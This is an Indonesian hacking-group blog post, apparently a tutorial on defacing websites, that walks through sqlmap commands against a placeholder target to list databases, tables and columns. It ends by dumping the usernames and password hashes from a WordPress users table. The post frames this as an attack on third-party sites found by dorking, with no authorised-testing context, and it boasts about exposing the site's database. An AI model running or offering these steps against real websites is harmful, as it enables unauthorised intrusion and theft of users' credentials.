Deface dengan SQLMap di windows

INDONESIA HACKER CYBER TEAM

UDah lama kagak Post tentang Deface :v bertemu kembali dengan saya ./Dr.D4fuq404 :D
ane mau share ilmu nihh yaitu 

alat alat yang anda butuhkan :
- DORK SQLmap
- Phyton 2.7
- Script SQLmap
- Internet
- Windows
pertama kita buka CMD lalu ketikan command berikut

sqlmap.py -u http://www.siteTARGET.com/hki/news/news.php?id
=37 --dbs

atau bisa juga dengan command berikut

 sqlmap.py -u http://www.siteTARGET.com/hki/news/news.php?id=37 --current-db

lalu tekan  enter,,jika site nya vuln atau vulnerable maka hasilnya akan tampak seperti SS yang ada di bawah ini 

klik untuk memperbesar

untuk tahap selanjutnya lalu ita ketikan command di bawah pada CMD sobat ( sebelumnya sobat sudah menentukan database mana yang ingin sobat lihat )

sqlmap.py -u http://www.siteTARGET/hki/news/news.php?id=37 -D wpdb_1n0v4s1 --tables

maka hasilnya akan tampak seperti yang ada di SS di bawah

klik untuk memperbesar

selanjutnya kita ketikan lagi command yg di bawah ini di CMD sobat

sqlmap.py -u http://www.siteTARGET/hki/news/news.php?id=37 -D wpdb_1n0v4s1 -T wp_tbl_1n0v4s1users --columns

maka hasilnya akan tampak seperti ss di bawah

klik untuk memperbesar

langkah selanjutnya kita ketikan command yg di bawah ini di CMD sobat

sqlmap.py -u http://www.siteTARGET/hki/news/news.php?id
=37 -D wpdb_1n0v4s1 -T wp_tbl_1n0v4s1users -C user_login,user_pass --dump

 maka hasilnya seperti yang di bawah ini  jreng jreng telanjang dah tuh database website nya 

klik untuk memperbesar 

sebagai catatan buat sobat arti dari command command yang di atas :
--dbs ( memanggil semua database yang ada dalam server )
--current-db ( hanya mengambil database yang terkait di dalam situs web tersebut )
--tables ( memanggil table yang ada di dalam database )
--columns ( memanggil kolom yang ada di dalam database table )
--dump ( memanggil username dan password yg terdapat di dalam database tabel )